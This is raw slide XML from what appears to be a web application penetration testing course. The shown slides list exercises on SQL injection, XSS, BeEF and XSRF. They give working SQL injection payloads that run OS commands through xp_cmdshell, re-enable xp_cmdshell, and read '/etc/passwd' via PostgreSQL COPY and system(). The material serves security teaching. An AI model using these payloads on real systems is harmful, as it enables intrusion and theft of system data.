                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Two options are available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can use xp_cmdshell to call osql.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Requires username and password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Probably easier ways exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can create a stored procedure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Requires permission to create objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses the VBS FileSystem Object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example in notes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1507667"/>
            <a:ext cx="8458200" cy="45720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0"/>
            <a:ext cx="3390900" cy="64770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b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t>Exploitation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Bypass Flaws</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Authentication Bypass</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t>Authentication Bypass Exercise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Injection Flaws</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SQL Injection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File Handling with SQL Injection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OS Interaction with SQL Injection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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t>sqlmap Exercise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
            </a:endParaRP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Port Scanning with SQL Injection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File Injection with SQL Injection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Prepared Injection Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" pitchFamily="-105" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Prepared Files Exercise</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Blind SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" pitchFamily="-105" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection Exercise</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XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" pitchFamily="-105" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Persistent XSS Exercise</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Advanced XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" pitchFamily="-105" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Durzosploit Exercise</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XSS Frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">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BeEF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Lucida Grande" pitchFamily="-105" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> BeEF Exercise</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Limiting XSS targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Session Flaws</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Session Fixation</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XSRF</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MonkeyFist Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Putting It Together</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Attack Scenario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" pitchFamily="-105" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Next Steps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13318"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154900"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Read/Write to a File (PostGRES)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1593674"/>
            <a:ext cx="8686800" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses the Copy SQL command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>COPY mydata FROM '/etc/passwd';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Inserts data into the table specified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>COPY mydata TO '/tmp/data'; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Writes data to a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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46083"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06279"/>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46086"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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>OS Interaction (MSSQL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>MS SQL allows OS interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It uses the infamous xp_cmdshell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Stored procedure that runs OS commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Data is not sent to client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Further queries are required to retrieve the results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Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>OS Interaction Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="108680" y="1693890"/>
            <a:ext cx="8915400" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Four queries are used to run the command and  retrieve the results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The would be injected individually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>First injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'; exec master.xp_cmdshell  'route print &gt; results.txt' --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Second injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'; Create TABLE results (outp varchar(5000)); --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Third injection:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>'; BULK INSERT results FROM 'results.txt' with (rowterminator = "\n\n\n\n"); --</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fourth injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>' and 1 in (select outp from results)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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Re-enabling xp_cmdshell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="111180" y="1770090"/>
            <a:ext cx="8915400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>xp_cmdshell is disabled by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is on modern MS SQL servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>2005 and later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Of course we can re-enable it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>EXEC sp_configure 'show advanced options', 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>RECONFIGURE;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>EXEC sp_configure 'xp_cmdshell', 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>RECONFIGURE;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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>OS Interaction (PostGRES)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274820" y="1711380"/>
            <a:ext cx="8610600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Results do not echo to the screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Similar to MS SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We run the commands with the privileges PostGRES is running with</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>SELECT system('cat /etc/passwd &gt; /tmp/results.txt');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>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54015" y="2081657"/>
            <a:ext cx="8458200" cy="44196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57350"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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Port Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>MS SQL can be used to port scan a network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We use the OPENROWSET command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is specific to MSSQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQL injection can then map your network</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Port Scanning Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1519226"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
